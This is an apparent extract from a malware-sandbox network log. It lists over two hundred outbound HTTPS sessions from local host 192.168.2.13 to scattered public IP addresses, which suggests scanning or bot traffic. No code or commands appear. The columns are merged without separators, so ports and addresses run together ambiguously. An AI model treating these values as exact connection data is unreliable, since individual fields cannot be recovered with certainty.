                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16842192.168.2.135707412.228.85.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16843192.168.2.1357638192.93.123.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16844192.168.2.134213820.201.158.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16845192.168.2.1342334197.218.104.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16846192.168.2.1342560167.105.134.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16847192.168.2.135325418.4.106.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16848192.168.2.1343736199.15.173.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16849192.168.2.136032483.117.70.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16850192.168.2.1337902212.64.97.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16851192.168.2.134295284.161.23.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16852192.168.2.1344752205.47.153.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16853192.168.2.1336852174.156.5.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16854192.168.2.13578944.12.238.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16855192.168.2.134491443.224.24.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16856192.168.2.1347196140.109.239.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16857192.168.2.1345904160.197.134.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16858192.168.2.1344246146.23.53.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16859192.168.2.1342396200.205.98.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16860192.168.2.1333364192.201.33.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16861192.168.2.135519444.212.72.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16862192.168.2.1359618104.101.71.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16863192.168.2.1346540108.224.90.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16864192.168.2.1355482205.161.168.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16865192.168.2.136018866.43.85.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16866192.168.2.134672691.221.200.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16867192.168.2.1344516189.215.233.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16868192.168.2.1352228184.202.220.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16869192.168.2.1360490190.127.44.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16870192.168.2.1351896222.11.255.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16871192.168.2.1355160183.165.116.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16872192.168.2.135619085.184.249.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16873192.168.2.1333976194.208.23.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16874192.168.2.1358676197.125.74.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16875192.168.2.135291837.22.78.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16876192.168.2.1347298177.149.75.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16877192.168.2.1355830130.94.96.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16878192.168.2.134803281.140.60.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16879192.168.2.1357144161.130.211.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16880192.168.2.13469828.137.28.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16881192.168.2.1349246172.129.81.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16882192.168.2.133561099.20.20.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16883192.168.2.1359210136.125.30.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16884192.168.2.1359946174.123.223.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16885192.168.2.1360444218.241.227.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16886192.168.2.1336672191.133.27.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16887192.168.2.1335842112.13.37.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16888192.168.2.1334456178.71.172.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16889192.168.2.13579181.11.205.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16890192.168.2.1340498190.233.199.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16891192.168.2.1349802101.39.142.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16892192.168.2.136099613.181.30.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16893192.168.2.1333608114.172.82.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16894192.168.2.1336922147.168.228.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16895192.168.2.1336272177.187.13.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16896192.168.2.134103235.52.23.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16897192.168.2.1357976101.33.60.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16898192.168.2.134273439.182.129.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16899192.168.2.1339870170.36.109.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16900192.168.2.133582875.129.180.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16901192.168.2.1357196154.97.225.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16902192.168.2.135072420.180.151.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16903192.168.2.133777449.65.60.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16904192.168.2.134675235.36.96.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16905192.168.2.134160642.36.116.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16906192.168.2.1338292114.39.59.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16907192.168.2.1359046100.63.98.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16908192.168.2.1337610151.190.144.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16909192.168.2.133766885.12.99.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16910192.168.2.1345010181.100.210.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16911192.168.2.133995614.111.38.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16912192.168.2.1353216119.16.131.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16913192.168.2.134400823.72.255.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16914192.168.2.1347050183.9.24.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16915192.168.2.1342776196.145.197.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16916192.168.2.135035468.222.215.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16917192.168.2.1345750209.246.130.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16918192.168.2.1358162110.31.15.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16919192.168.2.134362076.191.93.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16920192.168.2.1347600102.65.10.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16921192.168.2.1355908179.150.82.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16922192.168.2.1345856201.130.127.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16923192.168.2.133687850.197.159.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16924192.168.2.1352008187.127.27.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16925192.168.2.133776248.192.168.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16926192.168.2.135577231.177.27.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16927192.168.2.135712844.81.109.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16928192.168.2.135775635.103.80.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16929192.168.2.133587440.81.146.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16930192.168.2.1352940171.153.89.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16931192.168.2.134045625.249.55.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16932192.168.2.1351788206.15.62.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16933192.168.2.133545052.184.127.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16934192.168.2.13583128.48.85.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16935192.168.2.1355478186.108.132.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16936192.168.2.135140219.150.224.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16937192.168.2.1335246166.77.48.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16938192.168.2.1359330201.225.200.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16939192.168.2.133521224.203.247.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16940192.168.2.1355798168.80.214.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16941192.168.2.133396232.237.255.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16942192.168.2.135369450.156.56.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16943192.168.2.1349226213.8.7.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16944192.168.2.134668858.33.28.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16945192.168.2.1347746185.34.139.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16946192.168.2.1354722152.215.124.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16947192.168.2.135002469.85.62.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16948192.168.2.1347284152.92.240.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16949192.168.2.1345382139.169.197.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16950192.168.2.133895459.69.210.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16951192.168.2.1336232187.58.81.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16952192.168.2.135020640.240.33.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16953192.168.2.1340552140.116.128.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16954192.168.2.1348456179.6.226.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16955192.168.2.1335598200.176.48.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16956192.168.2.1334142131.135.104.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16957192.168.2.134156062.25.155.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16958192.168.2.1356594148.131.60.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16959192.168.2.134002877.174.47.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16960192.168.2.1353060201.178.29.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16961192.168.2.1350252148.238.200.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16962192.168.2.135734418.188.177.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16963192.168.2.133959077.75.79.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16964192.168.2.135052686.191.225.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16965192.168.2.133937417.105.102.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16966192.168.2.1342476223.177.63.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16967192.168.2.135688077.57.99.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16968192.168.2.13503425.172.97.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16969192.168.2.135576298.186.10.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16970192.168.2.1349718119.191.25.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16971192.168.2.1356692207.162.80.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16972192.168.2.133777271.95.21.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16973192.168.2.134453836.212.31.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16974192.168.2.133802266.27.46.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16975192.168.2.1360374196.209.71.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16976192.168.2.133439047.185.54.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16977192.168.2.1340468203.156.191.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16978192.168.2.134910844.83.197.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16979192.168.2.1360644218.209.186.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16980192.168.2.1354494187.175.197.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16981192.168.2.13554321.187.185.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16982192.168.2.133741659.215.15.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16983192.168.2.1332786155.133.122.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16984192.168.2.135643077.182.50.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16985192.168.2.1345230213.56.200.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16986192.168.2.134392618.0.15.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16987192.168.2.1336844181.2.29.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16988192.168.2.135772464.173.229.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16989192.168.2.1346404189.229.249.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16990192.168.2.1338240160.189.244.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16991192.168.2.1356568182.232.181.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16992192.168.2.1353902167.248.202.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16993192.168.2.136068425.20.117.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16994192.168.2.1359410208.158.186.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16995192.168.2.1357260116.64.233.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16996192.168.2.133626824.112.121.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16997192.168.2.135772058.194.32.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16998192.168.2.1360288200.17.195.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16999192.168.2.134987677.17.66.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17000192.168.2.135470617.225.169.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17001192.168.2.1341478156.234.146.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17002192.168.2.134635860.97.68.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17003192.168.2.1357594180.205.139.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17004192.168.2.1341432169.93.78.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17005192.168.2.1340968187.173.174.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17006192.168.2.1342586130.196.152.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17007192.168.2.133749069.249.252.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17008192.168.2.1347088219.128.31.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17009192.168.2.133642251.219.154.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17010192.168.2.1342992191.2.125.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17011192.168.2.134504093.142.219.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17012192.168.2.1354598186.196.145.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17013192.168.2.1336084177.233.38.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17014192.168.2.134466892.197.118.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17015192.168.2.134141468.60.193.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17016192.168.2.1341310190.177.140.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17017192.168.2.135639417.242.247.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17018192.168.2.1337176130.254.22.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17019192.168.2.135654250.20.132.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17020192.168.2.1346640110.34.54.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17021192.168.2.1352078106.74.127.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17022192.168.2.1335486160.25.251.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17023192.168.2.1357204211.105.240.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17024192.168.2.1332886101.174.226.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17025192.168.2.1341706189.46.42.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17026192.168.2.1339416210.97.135.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17027192.168.2.133869687.229.231.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17028192.168.2.1341018140.136.36.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17029192.168.2.135138612.212.235.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17030192.168.2.1336360125.202.14.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17031192.168.2.133453052.138.141.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17032192.168.2.1335842164.186.85.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17033192.168.2.1339548216.28.52.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17034192.168.2.1360160167.174.46.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17035192.168.2.135155641.34.72.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17036192.168.2.1356602189.128.30.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17037192.168.2.1345542132.109.58.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17038192.168.2.1341046151.131.182.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17039192.168.2.135034884.151.56.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17040192.168.2.133919058.186.160.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17041192.168.2.1359326117.239.32.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17042192.168.2.1333492153.102.186.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17043192.168.2.1357236175.116.194.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17044192.168.2.1335972132.14.202.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17045192.168.2.135621658.190.96.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17046192.168.2.135750088.147.40.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17047192.168.2.133631295.130.41.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17048192.168.2.1334026175.142.123.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17049192.168.2.1356010197.30.3.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17050192.168.2.1359416137.178.242.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17051192.168.2.1339956222.172.95.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17052192.168.2.1343736131.36.66.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17053192.168.2.134187073.12.20.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17054192.168.2.1346254148.241.22.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17055192.168.2.1350208193.85.48.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17056192.168.2.134758671.105.24.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17057192.168.2.133427053.167.235.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17058192.168.2.1340498195.98.119.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17059192.168.2.1340262187.150.190.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17060192.168.2.134345842.178.232.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17061192.168.2.1334436121.247.140.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17062192.168.2.1358456191.113.189.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
